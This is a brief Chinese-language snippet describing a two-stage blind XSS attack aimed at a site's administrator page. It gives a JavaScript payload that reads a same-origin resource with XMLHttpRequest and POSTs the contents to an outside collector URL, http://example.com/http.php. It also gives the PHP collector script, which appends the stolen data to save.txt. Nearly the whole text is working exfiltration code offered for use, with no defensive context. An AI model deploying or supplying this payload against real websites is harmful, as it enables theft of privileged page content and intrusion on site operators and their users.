通过xss第一次取得网页内容,然后获取到管理员账号页面进行二次盲打。js需要保留script部分其余去除。
<html><p id='d1'></p>
<script>
function get(url) {
try {
var req = new XMLHttpRequest();
req.open('GET', url, false);
req.send(null);
if(req.status == 200)
return req.responseText;
} catch(err) {
}
return null;
}
function post(url,content){
var req = new XMLHttpRequest();
req.open("POST", url, true);
var formData = new FormData();
formData.append("cc", content);
req.send(formData);
}
var role = get('/static/e.js;');
post('http://example.com/http.php',escape(role));
document.getElementById("d1").innerHTML=role.length;
</script></html>
http.php 获取到的内容写入save.txt
<?php
file_put_contents('save.txt', $_REQUEST["cc"]."
",FILE_APPEND);
print("ok");